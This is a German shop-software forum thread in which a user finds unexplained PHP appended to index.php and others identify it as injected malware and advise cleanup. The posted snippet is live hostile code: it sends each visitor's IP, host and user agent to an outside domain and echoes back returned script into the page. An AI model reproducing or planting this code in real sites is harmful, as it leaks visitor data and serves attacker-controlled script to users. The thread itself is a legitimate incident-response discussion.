"Merkwürdiger" Code in der index.php

TheOggy

Sehr aktives Mitglied
6. Oktober 2009
957
38
Berlin
Hi,

am Ende der index.php haben wir folgenden Code gefunden und können diesen nicht ganz zuordnen. In der Originalen index.php ist dieser nicht enthalten.
Weiß leider auch nicht ob er vielleicht zu irgendeinem Plugin oder ähnlichem gehört...vielleicht kann jemand von euch was damit anfangen

PHP:
$wp_ulr = 'logs'; $wp_tplt = 'http'; error_reporting(0); ini_set('display_errors',0); $wp_vlib = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_vlib) && !preg_match ('/bot/i', $wp_vlib))){
$wp_tos="http://".$wp_ulr.$wp_tplt.".com/".$wp_ulr."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_vlib);
if (function_exists('curl_init')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_tos); curl_setopt ($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_algo = curl_exec ($ch); curl_close($ch);}  else {$wp_algo = @file_get_contents($wp_tos);}}
if ( substr($wp_algo,1,3) === 'scr' ){ echo $wp_algo; }

Gruß Oggy
 

MBesancon

Administrator
Mitarbeiter
1. Oktober 2010
2.049
184
Erkelenz
AW: "Merkwürdiger" Code in der index.php

Der Code ist nicht im Standard enthalten! Auf den ersten Blick sieht das für mich nach eingeschleustem Schadcode aus. Du solltest deine Zugangsdaten ändern, prüfen was in der letzten Zeit verändert wurde und anschließend die Shop-Dateien neu einspielen. Wichtig ist auf jeden Fall die Zuagngsdaten zu ändern.
 

TheOggy

Sehr aktives Mitglied
6. Oktober 2009
957
38
Berlin
AW: "Merkwürdiger" Code in der index.php

Hi,

habe ich getan, habe den Code auch entfernt...muss nur mal schauen, ob noch mehr php dateien betroffen sind. Weiß auch noch nicht, wie dies passiert ist/passieren konnte.

danke gruß tobi
 

TheOggy

Sehr aktives Mitglied
6. Oktober 2009
957
38
Berlin
AW: "Merkwürdiger" Code in der index.php

also etwas ist komisch...beim Shopdateiencheck zeigt er mir modifizierte dateien an, wenn ich diese mit originalen ersetze steht trotzdem modifiziert da...auch kann ich keinen unterschied im code in den dateien feststellen.
jemand eine idee?
 

boaa-group

Sehr aktives Mitglied
28. Dezember 2007
4.932
8
Thailand, Bangkok
AW: "Merkwürdiger" Code in der index.php

Du musst beim Upload darauf achten, dass du die PHP Dateien im Binärmodus hochlädst... dann sollte es passen. Prüfe auch deine .htaccess Datei. In den meisten Fällen werden bei solchen "Angriffen" die index.php und die .htaccess mit Schadcode infiziert.
 

TheOggy

Sehr aktives Mitglied
6. Oktober 2009
957
38
Berlin
AW: "Merkwürdiger" Code in der index.php

danke für den Tipp!

ein paar dateien bleiben im modifiziert status, auch wenn ich sie binär hochlade.
da noch eine idee warum das so ist?

egal ob ich es aus nem frischen shop aus dem download bereich oder aus einem backup...
 

upbox

Offizieller Servicepartner
SPBanner
17. Januar 2011
235
16
AW: "Merkwürdiger" Code in der index.php

Kuck dir doch bitte mal die Rechte der entsprechenden Dateien an. Kann der FTP User die überhaupt überschreiben?
 

TheOggy

Sehr aktives Mitglied
6. Oktober 2009
957
38
Berlin
AW: "Merkwürdiger" Code in der index.php

hi, haben anscheindend alle 640...

er scheint sie zu ersetzen, datum is von heute...aber sagt modifiziert im backend
 

casim

Sehr aktives Mitglied
26. Juni 2012
5.934
9
AW: "Merkwürdiger" Code in der index.php

erst dateien mal löschen...dann neu übertragen ... klappt der Löschvorgang?
 

TheOggy

Sehr aktives Mitglied
6. Oktober 2009
957
38
Berlin
AW: "Merkwürdiger" Code in der index.php

kann die dateien umbennen und löschen...bei einer datei hat es so geklappt, bei 4 anderen nicht.
 
Ähnliche Themen
Titel Forum Antworten Datum
Neu Workflow - Positionen an Dropshipping-Lieferant mailen. Warum funktioniert dieser Code nicht? User helfen Usern - Fragen zu JTL-Wawi 1
Neu Error Code = 0 bei Installation JTL-Shop 5.3.1 Einrichtung JTL-Shop5 3
Neu QR Code auf Rechnungen will zuviel haben User helfen Usern - Fragen zu JTL-Wawi 0
EAN-Code von Umverpackungen hinterlegen JTL-Wawi 1.7 3
Neu jtl wawi Versanddatenexport Originalmeldung: In der Sendung trat mindestens ein harter Fehler auf. Code: 1101 Schnittstellen Import / Export 2
Neu Gutscheine mit Anzahl und Code erstellen ? Allgemeine Fragen zu JTL-Shop 1
Neu QR Code Zahlung User helfen Usern - Fragen zu JTL-Wawi 0
Neu get Coupon Code from order Technische Fragen zu Plugins und Templates 6
Neu Verbesserungsvorschlag: Wareneinigang ohne EAN Code JTL-WMS / JTL-Packtisch+ - Ideen, Lob und Kritik 6
Neu RKSV QR-Code auf Bon Einrichtung / Updates von JTL-POS 6
Wichtig UPS Änderung der Authentifizierungsmethode zu OAuth2 JTL-ShippingLabels - Ideen, Lob und Kritik 0
Grundepreise bei Vaterartikel in der Artikelvorschau im Shop JTL-Wawi 1.8 0
Neu Einschränkung der abzuholenden Aufträge Shopify-Connector 1
Neu Wie kann ich mit der Wawi Ebay Rechnungen erstellen und nach ebay hochladen? eBay-Anbindung - Fehler und Bugs 3
Neu Creation Date der Artikel Falsch Shopware-Connector 0
Neu Datenträgerverwendung oberste Tabellen - Größe der DB verringern (Logs etc) User helfen Usern - Fragen zu JTL-Wawi 2
Neu Fehler beim Hochladen der Datei JTL-Shop - Fehler und Bugs 0
Neu Mehrere Firmen - automatisierte Änderung der Kundennummer? Arbeitsabläufe in JTL-Wawi 7
Neu Der Shop schickt die Aufträge nicht mehr an die Wawi JTL-Shop - Fehler und Bugs 1
Neu Automatische Sortierung der Bilder & Anzahl der Ebay Bilder eBay-Anbindung - Fehler und Bugs 0
Verwendung der Statistik in Wawi 1.8: JTL-Wawi 1.8 3
Neu Kann man in der POS zwischen Mandanten umschalten? User helfen Usern - Fragen zu JTL-Wawi 1
Neu Footer in der Größe anpassen Gelöste Themen in diesem Bereich 5
Falsche Anzeige der Bestandsführung JTL-Wawi - Fehler und Bugs 5
Neu Drucken-Button auf der Artikeldetailseite Allgemeine Fragen zu JTL-Shop 0
Setup Nummernkreise neue Firma - Länge der Kreise JTL-Wawi 1.8 8
Neu Darstellung/Werte der Variantenauswahl auf Amazon anpassbar? Amazon-Lister - Ideen, Lob und Kritik 0
Neu Kategorienbaum in einer Unterkategorie über der Filterung ausblenden Allgemeine Fragen zu JTL-Shop 1
Neu Anzahl der gefüllten Versandboxen ausgeben lassen Eigene Übersichten in der JTL-Wawi 1
Neu leeres Textfeld erstellen für einen Hinweis auf der Rechnung User helfen Usern - Fragen zu JTL-Wawi 2
Versandkosten werden bei der Gewinnermittlung nicht breücksichtig (1.8.12.2) JTL-Wawi 1.8 1
Wie kann ich etwas in der WAWI Datenbank per SQL ändern? JTL-Wawi 1.8 2
Neu Was steckt hinter der Zahl von 53 Bildern auf Ebay bei Variationsartikeln (und einer unsinnigen Fehlermeldung der Wawi)? JTL-Wawi - Fehler und Bugs 2
Neu Gravierender Fehler in der Shop Software Betrieb / Pflege von JTL-Shop 3
Neu Packtisch: In der Liste der Aufträge neue Feld-Spalte mit Spalteneditor hinzufügen Arbeitsabläufe in JTL-WMS / JTL-Packtisch+ 0
Neu Workflow der bei Stücklisten: Überverkäufe de-/aktivieren User helfen Usern - Fragen zu JTL-Wawi 11
Wo befindet sich das Feld mit der Information für "Zustandsbeschreibung" auf Ebay? JTL-Wawi 1.8 9
Neu Nach Umstellung auf WMS Probleme mit der JTL Ameise Installation von JTL-WMS / JTL-Packtisch+ 0
Neu Vorschaubilder in der Artikeldetailseite werden nicht angezeigt Betrieb / Pflege von JTL-Shop 1
Neu Update des JTL shops aus der Wawi funktioniert nicht Allgemeine Fragen zu JTL-Shop 1
Neu EK-Netto der Verkäufe aus Datenbank ? User helfen Usern - Fragen zu JTL-Wawi 5
Neu Shopify Erhöhung der Varianten von 100 auf 2000 - Connector App Problem Shopify-Connector 4
Fehler beim Rendering der Attribute bei SCX Abgleich kaufland.de - Anbindung (SCX) 4
Neu Eigene Felder des Auftrages in der Druckvorlage Druck-/ E-Mail-/ Exportvorlagen in JTL-Wawi 2
Neu klare Warnung vor den Bausteinen und der PDF in Vorlagen User helfen Usern - Fragen zu JTL-Wawi 4
Neu Folgendes fehlt seit Mai 23 auf der Rechnung: "Versanddatum: Ist gleich dem Rechnungsdatum." Druck-/ E-Mail-/ Exportvorlagen in JTL-Wawi 4
Workflow MwSt.-Sätze ersetzen 0% -> 19% ändert netto in Positionen aber nicht in der Auftragssumme JTL-Wawi 1.7 2
Neu Menüleiste wird plötzlich in der Mitte von der Seite angezeigt Allgemeine Fragen zu JTL-Shop 0
Neu SEO URL der Kategorien wird nicht an Shopware 6 übertragen Shopware-Connector 0
Neu Formatierung der Spalte Rabatt Druck-/ E-Mail-/ Exportvorlagen in JTL-Wawi 5

Ähnliche Themen